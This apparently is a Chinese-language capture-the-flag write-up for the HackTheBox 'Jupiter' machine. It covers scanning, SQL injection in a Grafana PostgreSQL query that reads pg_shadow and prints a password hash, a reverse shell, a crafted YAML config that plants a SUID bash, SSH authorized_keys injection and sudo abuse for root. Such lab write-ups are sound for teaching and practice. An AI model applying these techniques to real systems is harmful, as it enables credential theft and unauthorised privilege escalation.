Nmap

┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -A 10.10.11.216
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 11:21 EDT
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.94% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Nmap scan report for 10.10.11.216
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 ac5bbe792dc97a00ed9ae62b2d0e9b32 (ECDSA)
|_  256 6001d7db927b13f0ba20c6c900a71b41 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=6/5%OT=22%CT=1%CU=30597%PV=Y%DS=2%DC=T%G=Y%TM=647DFDB9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=Z%TS=B)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O3
OS:=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   270.35 ms 10.10.16.1
2   176.97 ms 10.10.11.216

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.74 seconds

常见的两个端口22 和 80端口

image.png
image.png

添加 /etc/hosts
10.10.11.216 jupiter.htb

主域名

image.png
image.png

根域名没啥功能点,暂时看上去,vhost 碰撞看看

┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# gobuster vhost -u http://jupiter.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://jupiter.htb
[+] Method:          GET
[+] Threads:         100
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/06/05 11:25:42 Starting gobuster in VHOST enumeration mode
===============================================================
Found: kiosk.jupiter.htb Status: 200 [Size: 34390]
Progress: 114441 / 114442 (100.00%)===============================================================
2023/06/05 11:41:33 Finished
===============================================================

kiosk.jupiter.htb

有一个kiosk.jupiter.htb的域名,加入到hosts文件中

image.png
image.png

是一个grafana的应用

image.png
image.png

bp看到历史记录中有这么一个包

image.png
image.png

这里能控制sql语句

image.png
image.png
这里能看到数据库的类型是PostgreSql 上hacktrick看看相关注入手法

Refer:https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql

postgreSql

查看数据库

SELECT datname FROM pg_database;

image.png
image.png
postgres
moon_namesdb
template1
template0

Readcredentials

SELECT usename, passwd from pg_shadow;

image.png
image.png
username passwd
postgres Null
grafana_viewer SCRAM-SHA-256$4096:K9IJE4h9f9+tr7u7AZL76w==$qdrtC1sThWDZGwnPwNctrEbEwc8rFpLWYFVTeLOy3ss=:oD4gG69X8qrSG4bXtQ62M83OkjeFDOYrypE3tUv0JOY=

RCE

image.png
image.png
image.png
image.png
image.png
image.png

尝试反弹shell

image.png
image.png
image.png
image.png

shell!!!! ^-^

信息收集

linpeas

上linpeas 收集一下信息

image.png
image.png

跟用户有关系的信息

pspy

image.png
image.png

一堆的反弹shell hhhh 同时打的人太多了

juno运行的进程

image.png
image.png

等着等着发现了uid=1000(juno)运行了一个脚本 shadow-simulation.sh (估计是用来模拟网络用的)而且估计是定时任务

然后紧接着 删除了 /dev/shm/shadow.data
然后通过shadow 命令 加上/dev/shm/network-simulation.yml作为参数
所以我们看看配置文件

image.png
image.png

network-simulation.yml

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/curl
      args: -s server
      start_time: 5s

这个配置文件看起来就像是,服务端启动一个开在 80端口web服务,然后客户端去请求这个web服务
path 的参数的 位置感觉像是 执行的二进制文件的绝对路径
args 自然就是参数

尝试执行chmod +s /bin/bash 的命令 给bash带上suid

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/someb0dy/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/someb0dy/bash
      start_time: 5s

然后上传到靶机的/dev/shm/目录下,值得说一下的是,这个目录存储的内容其实是存储在内存当中的

我先把内容上传到/tmp/someb0dy目录下
然后再通过cp /tmp/someb0dy/network-simulation.yml /dev/shm/ 覆盖原本的network-simulation.yml
记得给/tmp/someb0dy附上 777的权限,不然juno用户没有权限写入到 这个文件夹

image.png
image.png

然后在/tmp/someb0dy下 运行./bash -p ,成功变成juno 权限

来到/home/juno查看那个脚本也可以确认

bash-5.1$ cat shadow-simulation.sh
cat shadow-simulation.sh
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/

ssh 公钥写入

我们还可以直接写入公钥到.ssh/authorized_keys 里面就可以ssh登录了

ssh-key -f someb0dy    生成公私钥
cp  /tmp/someb0dy/someb0dy.pub /home/juno/.ssh/authorized_keys
image.png
image.png

通过私钥成功登录,发现是science 组,搜索一下文件

image.png
image.png

frp代理流量

看着有许多端口的,搭建一个代理看看

image.png
image.png

这里为什么要搜token信息呢,因为8888端口开了一个jupyter的服务

image.png
image.png

上面用了都不对
然后直接看日志文件今天6.6,里面的可以用了

image.png
image.png

用日志里面的可以

image.png
image.png
image.png
image.png
image.png
image.png

一样和上一个用户一样的手法,同样写入.ssh/authorized_keys

image.png
image.png

提权

jovian@jupiter:/usr/local/bin$ sudo -l
Matching Defaults entries for jovian on jupiter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User jovian may run the following commands on jupiter:
    (ALL) NOPASSWD: /usr/local/bin/sattrack

可以以管理员执行权限执行这个**/usr/local/bin/sattrack**

image.png
image.png

我们直接运行这个东西,输出了一些提示信息
把bash换成这个二进制文件

image.png
image.png

总结

这个靶机总体来说难道中等,常规的收集信息手段,收集到子域名后,进一步收集信息,通过Postgresql 拿到Postgresql用户的shell,通过查看进程信息,来进一步获取juno的权限,接着通过juno所在的组,获取到jovian的权限,最后成功拿到root